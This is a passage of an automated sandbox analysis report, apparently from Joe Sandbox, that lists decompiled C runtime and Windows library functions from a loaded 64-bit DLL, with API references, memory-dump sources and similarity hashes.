				 *_t384 = 0x16;
				E00007FFA7FFA0AE69744();
				if ((sil & 0x00000008) != 0) goto 0xae69024;
				_t385 = _t397[1];
				 *_t397 = _t407;
				if (_t385 == 0) goto 0xae6901d;
				 *_t385 = _t407;
				goto 0xae690a8;
				r8d = 0x80000000;
				_t114 = _t405 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0xae6904c;
				if ((sil & 0x00000001) == 0) goto 0xae6908f;
				if ((sil & 0x00000002) == 0) goto 0xae69047;
				if (_t261 - r8d <= 0) goto 0xae69095;
				goto 0xae6904c;
				if (_t261 - r9d <= 0) goto 0xae69097;
				 *((char*)(_t409 + 0x30)) = 1;
				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
				if ((_t258 & 0x00000001) != 0) goto 0xae69067;
				goto 0xae69097;
				_t395 = _t397[1];
				if ((_t258 & 0x00000002) == 0) goto 0xae6907f;
				if (_t395 == 0) goto 0xae6907a;
				 *_t395 =  *_t397;
				goto 0xae690a8;
				if (_t395 == 0) goto 0xae6908a;
				 *_t395 =  *_t397;
				goto 0xae690a8;
				if ((sil & 0x00000002) == 0) goto 0xae69097;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0xae690a6;
				 *_t396 =  *_t397;
				return  ~(_t261 | 0xffffffff);
			}

0x7ffa0ae6893c
0x7ffa0ae6893c
0x7ffa0ae6893c
0x7ffa0ae6893c
0x7ffa0ae68941
0x7ffa0ae68958
0x7ffa0ae6895b
0x7ffa0ae6895e
0x7ffa0ae68962
0x7ffa0ae68965
0x7ffa0ae6896d
0x7ffa0ae68973
0x7ffa0ae68975
0x7ffa0ae6897a
0x7ffa0ae68980
0x7ffa0ae68985
0x7ffa0ae6898a
0x7ffa0ae6898c
0x7ffa0ae68993
0x7ffa0ae68995
0x7ffa0ae6899a
0x7ffa0ae6899d
0x7ffa0ae689a1
0x7ffa0ae689a4
0x7ffa0ae689af
0x7ffa0ae689b4
0x7ffa0ae689b9
0x7ffa0ae689c0
0x7ffa0ae689c9
0x7ffa0ae689cc
0x7ffa0ae689db
0x7ffa0ae689de
0x7ffa0ae689e5
0x7ffa0ae689e7
0x7ffa0ae689ec
0x7ffa0ae689ee
0x7ffa0ae689f8
0x7ffa0ae68a0a
0x7ffa0ae68a1a
0x7ffa0ae68a23
0x7ffa0ae68a25
0x7ffa0ae68a28
0x7ffa0ae68a2b
0x7ffa0ae68a2f
0x7ffa0ae68a32
0x7ffa0ae68a42
0x7ffa0ae68a4f
0x7ffa0ae68a5c
0x7ffa0ae68a64
0x7ffa0ae68a6a
0x7ffa0ae68a72
0x7ffa0ae68a72
0x7ffa0ae68a76
0x7ffa0ae68a7e
0x7ffa0ae68a84
0x7ffa0ae68a8c
0x7ffa0ae68a92
0x7ffa0ae68a9a
0x7ffa0ae68aa2
0x7ffa0ae68aaa
0x7ffa0ae68ab2
0x7ffa0ae68aba
0x7ffa0ae68ac2
0x7ffa0ae68aca
0x7ffa0ae68ad2
0x7ffa0ae68ada
0x7ffa0ae68ae2
0x7ffa0ae68aea
0x7ffa0ae68af2
0x7ffa0ae68afa
0x7ffa0ae68b02
0x7ffa0ae68b0d
0x7ffa0ae68b1f
0x7ffa0ae68b28
0x7ffa0ae68b32
0x7ffa0ae68b39
0x7ffa0ae68b41
0x7ffa0ae68b4b
0x7ffa0ae68b59
0x7ffa0ae68b61
0x7ffa0ae68b6a
0x7ffa0ae68b78
0x7ffa0ae68b80
0x7ffa0ae68b89
0x7ffa0ae68b97
0x7ffa0ae68b9f
0x7ffa0ae68ba8
0x7ffa0ae68bb6
0x7ffa0ae68bbe
0x7ffa0ae68bc6
0x7ffa0ae68bd4
0x7ffa0ae68bde
0x7ffa0ae68bea
0x7ffa0ae68bf5
0x7ffa0ae68c02
0x7ffa0ae68c0d
0x7ffa0ae68c1a
0x7ffa0ae68c25
0x7ffa0ae68c32
0x7ffa0ae68c3d
0x7ffa0ae68c4a
0x7ffa0ae68c55
0x7ffa0ae68c62
0x7ffa0ae68c6d
0x7ffa0ae68c7a
0x7ffa0ae68c81
0x7ffa0ae68c8e
0x7ffa0ae68c95
0x7ffa0ae68ca2
0x7ffa0ae68ca9
0x7ffa0ae68cb6
0x7ffa0ae68cbd
0x7ffa0ae68cd4
0x7ffa0ae68cd6
0x7ffa0ae68ce3
0x7ffa0ae68ced
0x7ffa0ae68cf2
0x7ffa0ae68cf8
0x7ffa0ae68cf8
0x7ffa0ae68cfb
0x7ffa0ae68d00
0x7ffa0ae68d09
0x7ffa0ae68d0e
0x7ffa0ae68d13
0x7ffa0ae68d15
0x7ffa0ae68d18
0x7ffa0ae68d1e
0x7ffa0ae68d21
0x7ffa0ae68d21
0x7ffa0ae68d25
0x7ffa0ae68d28
0x7ffa0ae68d2f
0x7ffa0ae68d34
0x7ffa0ae68d3c
0x7ffa0ae68d40
0x7ffa0ae68d46
0x7ffa0ae68d4b
0x7ffa0ae68d4d
0x7ffa0ae68d52
0x7ffa0ae68d58
0x7ffa0ae68d5d
0x7ffa0ae68d63
0x7ffa0ae68d69
0x7ffa0ae68d6f
0x7ffa0ae68d71
0x7ffa0ae68d77
0x7ffa0ae68d79
0x7ffa0ae68d7d
0x7ffa0ae68d7d
0x7ffa0ae68d81
0x7ffa0ae68d84
0x7ffa0ae68d8f
0x7ffa0ae68d99
0x7ffa0ae68d9d
0x7ffa0ae68da2
0x7ffa0ae68da5
0x7ffa0ae68da5
0x7ffa0ae68da8
0x7ffa0ae68dae
0x7ffa0ae68db4
0x7ffa0ae68dbb
0x7ffa0ae68dc5
0x7ffa0ae68dcd
0x7ffa0ae68dd6
0x7ffa0ae68de0
0x7ffa0ae68dee
0x7ffa0ae68df6
0x7ffa0ae68dff
0x7ffa0ae68e0d
0x7ffa0ae68e15
0x7ffa0ae68e1e
0x7ffa0ae68e2c
0x7ffa0ae68e34
0x7ffa0ae68e41
0x7ffa0ae68e47
0x7ffa0ae68e4d
0x7ffa0ae68e54
0x7ffa0ae68e61
0x7ffa0ae68e6f
0x7ffa0ae68e78
0x7ffa0ae68e83
0x7ffa0ae68e8c
0x7ffa0ae68e97
0x7ffa0ae68ea0
0x7ffa0ae68eab
0x7ffa0ae68eb4
0x7ffa0ae68ebf
0x7ffa0ae68ec8
0x7ffa0ae68ed3
0x7ffa0ae68ee0
0x7ffa0ae68eeb
0x7ffa0ae68ef8
0x7ffa0ae68eff
0x7ffa0ae68f0c
0x7ffa0ae68f13
0x7ffa0ae68f20
0x7ffa0ae68f27
0x7ffa0ae68f34
0x7ffa0ae68f3b
0x7ffa0ae68f52
0x7ffa0ae68f59
0x7ffa0ae68f63
0x7ffa0ae68f6e
0x7ffa0ae68f73
0x7ffa0ae68f79
0x7ffa0ae68f79
0x7ffa0ae68f7c
0x7ffa0ae68f81
0x7ffa0ae68f86
0x7ffa0ae68f8e
0x7ffa0ae68f93
0x7ffa0ae68f99
0x7ffa0ae68f9b
0x7ffa0ae68fa5
0x7ffa0ae68fb6
0x7ffa0ae68fbd
0x7ffa0ae68fc4
0x7ffa0ae68fcd
0x7ffa0ae68fd0
0x7ffa0ae68fd2
0x7ffa0ae68fd7
0x7ffa0ae68fdf
0x7ffa0ae68fdf
0x7ffa0ae68fe3
0x7ffa0ae68feb
0x7ffa0ae68ff1
0x7ffa0ae68ff6
0x7ffa0ae68ff8
0x7ffa0ae68ffd
0x7ffa0ae69003
0x7ffa0ae6900c
0x7ffa0ae6900e
0x7ffa0ae69012
0x7ffa0ae69018
0x7ffa0ae6901a
0x7ffa0ae6901f
0x7ffa0ae69024
0x7ffa0ae6902a
0x7ffa0ae6902a
0x7ffa0ae69032
0x7ffa0ae69038
0x7ffa0ae6903e
0x7ffa0ae69043
0x7ffa0ae69045
0x7ffa0ae6904a
0x7ffa0ae6904e
0x7ffa0ae69056
0x7ffa0ae69060
0x7ffa0ae69065
0x7ffa0ae69067
0x7ffa0ae6906d
0x7ffa0ae69072
0x7ffa0ae69077
0x7ffa0ae6907d
0x7ffa0ae69082
0x7ffa0ae69087
0x7ffa0ae6908d
0x7ffa0ae69093
0x7ffa0ae69097
0x7ffa0ae6909e
0x7ffa0ae690a3
0x7ffa0ae690c2

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE68980
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE68D58
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA0AE69003

Strings

f, xrefs: 00007FFA0AE68AA2
p, xrefs: 00007FFA0AE68A32
-, xrefs: 00007FFA0AE68A16
0, xrefs: 00007FFA0AE68DA8
p, xrefs: 00007FFA0AE68AAA

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$0$f$p$p
API String ID: 3215553584-1865143739
Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction ID: 4bf176edc45f0702acce830ba3b9b85f13e0e3ccf9d2799f0405bd9189d2ef48
Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction Fuzzy Hash: 5312B273A0816386FB60BF34F0542796692FB927D4F848972E69D466C4EF7DE4808B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE72FA0 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFA0AE72FCD
SelectObject.GDI32 ref: 00007FFA0AE72FE5
Polyline.GDI32 ref: 00007FFA0AE73230
MoveToEx.GDI32 ref: 00007FFA0AE7325C
LineTo.GDI32 ref: 00007FFA0AE73285
MoveToEx.GDI32 ref: 00007FFA0AE732B1
LineTo.GDI32 ref: 00007FFA0AE732DA
SelectObject.GDI32 ref: 00007FFA0AE732ED
DeleteObject.GDI32 ref: 00007FFA0AE732F8

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction ID: 31bfd468712f197fd607aed100dbdd9a98d3d0e0f8556e3f3c97aa76db8a7432
Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction Fuzzy Hash: C691CA76618B408BDB65DB28F05132AF7A5F7C9784F108226DACE97B69DF2CD4498F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6D8F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00007FFA7FFA0AE6D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0xaede008; // 0xa3acf2c2a32b
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ffa0ae60000 + 0x7f840 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0xae6da36;
				if (_t72 == 0) goto 0xae6d959;
				_t57 = _t72;
				goto 0xae6da38;
				if (__r8 == __r9) goto 0xae6da1b;
				_t61 =  *((intOrPtr*)(0x7ffa0ae60000 + 0x7f7a0 + __rsi * 8));
				if (_t61 == 0) goto 0xae6d980;
				if (_t61 != _t76) goto 0xae6da75;
				goto 0xae6da07;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t99, _t96);
				if (_t57 != 0) goto 0xae6da55;
				if (GetLastError() != 0x57) goto 0xae6d9f5;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FFA7FFA0AE6F5B0(_t90) == 0) goto 0xae6d9f5;
				r8d = _t37;
				if (E00007FFA7FFA0AE6F5B0(_t90) == 0) goto 0xae6d9f5;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0xae6da55;
				 *((intOrPtr*)(0x7ffa0ae60000 + 0x7f7a0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0xae6d962;
				_t91 =  *0xaede008; // 0xa3acf2c2a32b
				asm("dec eax");
				 *(0x7ffa0ae60000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

0x7ffa0ae6d8f0
0x7ffa0ae6d8f5
0x7ffa0ae6d8fa
0x7ffa0ae6d90c
0x7ffa0ae6d927
0x7ffa0ae6d92e
0x7ffa0ae6d938
0x7ffa0ae6d940
0x7ffa0ae6d946
0x7ffa0ae6d94f
0x7ffa0ae6d951
0x7ffa0ae6d954
0x7ffa0ae6d95c
0x7ffa0ae6d965
0x7ffa0ae6d970
0x7ffa0ae6d975
0x7ffa0ae6d97b
0x7ffa0ae6d98d
0x7ffa0ae6d993
0x7ffa0ae6d99f
0x7ffa0ae6d9ae
0x7ffa0ae6d9b0
0x7ffa0ae6d9b0
0x7ffa0ae6d9b6
0x7ffa0ae6d9c7
0x7ffa0ae6d9c9
0x7ffa0ae6d9dd
0x7ffa0ae6d9df
0x7ffa0ae6d9e7
0x7ffa0ae6d9f3
0x7ffa0ae6d9ff
0x7ffa0ae6da0e
0x7ffa0ae6da14
0x7ffa0ae6da28
0x7ffa0ae6da2e
0x7ffa0ae6da54

APIs

FreeLibrary.KERNEL32 ref: 00007FFA0AE6DA6F
GetProcAddress.KERNEL32 ref: 00007FFA0AE6DA7B

Strings

ext-ms-, xrefs: 00007FFA0AE6D9CC
api-ms-, xrefs: 00007FFA0AE6D9B9

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction ID: bbd5206a0d1e9e7998282a27357822fda93bbf2a7544b94f4d192a8184626612
Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction Fuzzy Hash: 9D41BF33B1DA6241FA15AB26FC541B52392AF06BE0F89C975DD1D87794FE3CE4458300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6B8D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFA0AE6B8E3
FlsGetValue.KERNEL32 ref: 00007FFA0AE6B8F8
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B919
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B946
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B957
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B968
SetLastError.KERNEL32 ref: 00007FFA0AE6B983

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
Instruction ID: 62f850adaceba7e2952be18691ae86a0ac0d155818335489e6e097b9eadb6dcf
Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
Instruction Fuzzy Hash: 13212832E4CA7642FA647731F95523962525F4BBE0F14CEB8D96E8B6D6FE2CA4408300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE728C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFA0AE728F1
GetLastError.KERNEL32 ref: 00007FFA0AE728FD
CloseHandle.KERNEL32 ref: 00007FFA0AE72915
CreateFileW.KERNEL32 ref: 00007FFA0AE72940
WriteConsoleW.KERNEL32 ref: 00007FFA0AE7295F

Strings

CONOUT$, xrefs: 00007FFA0AE72921

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction ID: 63931b6a153e1067be6e4b03cf1a3097e12117583d5c3e1bfe369f97d35c59fd
Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction Fuzzy Hash: 21119322B18B6187F750AB66F85436962A4FB8AFE4F048274DA5D877A4EF3CD4448740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6BA4C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BA5B
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BA91
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BABE
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BACF
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BAE0
SetLastError.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BAFB

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
Instruction ID: aac880881b6fae65a501f7969ae66ddbe8cdf6c38977a555e049c62a2ffa5a32
Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
Instruction Fuzzy Hash: 64115E32B4CA6242F9147731F56513922525F467F0F04CFB5D82E876D6FE2CB4019200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE69C24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFA0AE69C49
GetProcAddress.KERNEL32 ref: 00007FFA0AE69C5F
FreeLibrary.KERNEL32 ref: 00007FFA0AE69C86

Strings

mscoree.dll, xrefs: 00007FFA0AE69C40
CorExitProcess, xrefs: 00007FFA0AE69C58

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction ID: 35e21d0814290f055123282e0df0f008ce51abbae9720aac524d26fa0f2459ad
Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction Fuzzy Hash: ADF04F62A1871282EB10AF34F4543796360EF8B7A1F54C67AD96E462F5EF3CD044C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6EB68 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFA7FFA0AE6EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0xae6eb9a;
				if (sil >= 0) goto 0xae6eb9a;
				E00007FFA7FFA0AE71CEC(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0xae6ebf1;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0xae6ebb5;
				asm("dec eax");
				if (_t42 >= 0) goto 0xae6ebb5;
				E00007FFA7FFA0AE71CEC(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0xae6ebf1;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0xae6ebd1;
				asm("dec eax");
				if (_t43 >= 0) goto 0xae6ebd1;
				E00007FFA7FFA0AE71CEC(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0xae6ebf1;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0xae6ebf1;
				asm("dec eax");
				if (_t44 >= 0) goto 0xae6ebf1;
				if ((dil & 0x00000010) == 0) goto 0xae6ebee;
				E00007FFA7FFA0AE71CEC(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0xae6ec0b;
				asm("dec eax");
				if (_t46 >= 0) goto 0xae6ec0b;
				E00007FFA7FFA0AE71CEC(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x7ffa0ae6eb68
0x7ffa0ae6eb6d
0x7ffa0ae6eb7c
0x7ffa0ae6eb84
0x7ffa0ae6eb89
0x7ffa0ae6eb90
0x7ffa0ae6eb95
0x7ffa0ae6eb98
0x7ffa0ae6eb9f
0x7ffa0ae6eba2
0x7ffa0ae6eba4
0x7ffa0ae6eba9
0x7ffa0ae6ebab
0x7ffa0ae6ebb0
0x7ffa0ae6ebb3
0x7ffa0ae6ebb5
0x7ffa0ae6ebb9
0x7ffa0ae6ebbb
0x7ffa0ae6ebc0
0x7ffa0ae6ebc7
0x7ffa0ae6ebcc
0x7ffa0ae6ebcf
0x7ffa0ae6ebd1
0x7ffa0ae6ebd5
0x7ffa0ae6ebd7
0x7ffa0ae6ebdc
0x7ffa0ae6ebe2
0x7ffa0ae6ebe9
0x7ffa0ae6ebee
0x7ffa0ae6ebf1
0x7ffa0ae6ebf5
0x7ffa0ae6ebf7
0x7ffa0ae6ebfc
0x7ffa0ae6ec03
0x7ffa0ae6ec21

APIs

_set_statfp.LIBCMT ref: 00007FFA0AE6EB90
_set_statfp.LIBCMT ref: 00007FFA0AE6EBAB
_set_statfp.LIBCMT ref: 00007FFA0AE6EBC7
_set_statfp.LIBCMT ref: 00007FFA0AE6EC03

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
